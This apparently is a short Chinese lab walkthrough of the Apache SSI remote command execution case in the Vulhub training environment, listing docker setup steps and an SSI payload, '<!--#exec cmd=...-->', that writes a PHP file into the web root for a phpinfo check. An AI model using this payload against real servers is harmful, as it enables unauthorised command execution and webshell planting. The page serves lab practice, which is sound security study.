vulhub中的Apache SSI 远程命令执行漏洞

爱喝水的泡泡2024-01-09 11:42

Apache SSI 远程命令执行漏洞

1.cd到ssi-rce

cd /opt/vulhub/httpd/ssi-rce/

2.执行docker-compose up -d

docker-compose up -d

3.查看靶场是否开启成功

dooker ps

拉取成功了

4.访问url

这里已经执行成功了,注意这里需要加入/upload.php

5.写入一句话木马

<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->

6.提交查询

7.点击shell.shtml

8.查看是否写入成功

docker exec -it ssi-rce_apache_1 /bin/bash

9.获取phpinfo

相关推荐
架构源启1 天前
深度解析:Spring Boot + Apache OpenNLP 构建企业级 NLU 系统
spring boot·后端·apache
SeaTunnel1 天前
深度解析 Apache SeaTunnel 核心引擎三大技术创新:高可靠异步持久化与 CDC 架构优化实战
大数据·数据库·架构·apache·seatunnel
DolphinScheduler社区1 天前
第 8 篇|Apache DolphinScheduler 与 Flink Spark 数据引擎的边界、协同与最佳实践
大数据·flink·spark·开源·apache·海豚调度·大数据工作流调度
Apache IoTDB2 天前
Apache IoTDB V2.0.8 发布|新增模型并发推理,优化同步配置与安全加固
安全·apache·iotdb
蓝魔Y2 天前
Apache—Kafka实践
分布式·kafka·apache
Pocker_Spades_A3 天前
时序数据库选型指南:容量规划与压测方法(以 Apache IoTDB 为例)
apache·时序数据库·iotdb
云计算老刘4 天前
Keepalived + LVS(DR)+ Apache + NFS
apache·lvs
羑悻的小杀马特4 天前
工业时序数据库选型:从数据模型与存储引擎看 Apache IoTDB
apache·时序数据库·iotdb
Jermy Li4 天前
HugeGraph 正式晋升 Apache 顶级项目:重塑「图 + AI」底座
数据库·人工智能·apache·知识图谱·database·hugegraph·knowledge graph
可涵不会debug4 天前
时序数据库选型深度指南:Apache IoTDB——大数据时代的优选方案
apache·时序数据库·iotdb
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛05零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)06GPT-6发布日深度解析-Symphony架构200万Token实战07AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析08基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南09从限购到畅通:GLM-5.1 Coding Plan接入攻略10GPT-6核心能力解析及与现有主流大模型对比